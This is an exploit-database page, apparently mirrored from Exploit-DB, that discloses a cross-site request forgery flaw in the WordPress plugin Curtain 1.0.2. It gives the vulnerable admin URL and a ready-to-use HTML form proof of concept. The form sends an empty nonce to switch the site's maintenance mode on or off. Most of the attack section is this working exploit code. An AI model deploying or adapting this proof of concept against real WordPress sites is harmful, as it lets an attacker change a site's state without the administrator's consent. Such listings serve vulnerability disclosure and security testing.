[] NeoSense
E X P L O I T S
title author type platform port cve id

WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF)

Author: Hassan Khan Yusufzai
type: webapps
platform: php
port: 
date_added: 2022-03-30 
date_updated: 2022-03-30 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
# Exploit Title: WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF)
# Date: 24-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/curtain/
# Version: 1.0.2
# Tested on: Firefox

## Summary:

Cross site forgery vulnerability has been identified in curtain WordPress plugin that allows an attacker to to activate or deactivate sites maintenance mode.

## Vulnerable URL:

http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=0

## CSRF POC Exploit

```
<html>
  <body>
    <form action="http://localhost:10003/wp-admin/options-general.php">
      <input type="hidden" name="page" value="curtain" />
      <input type="hidden" name="&#95;wpnonce" value="" />
      <input type="hidden" name="mode" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.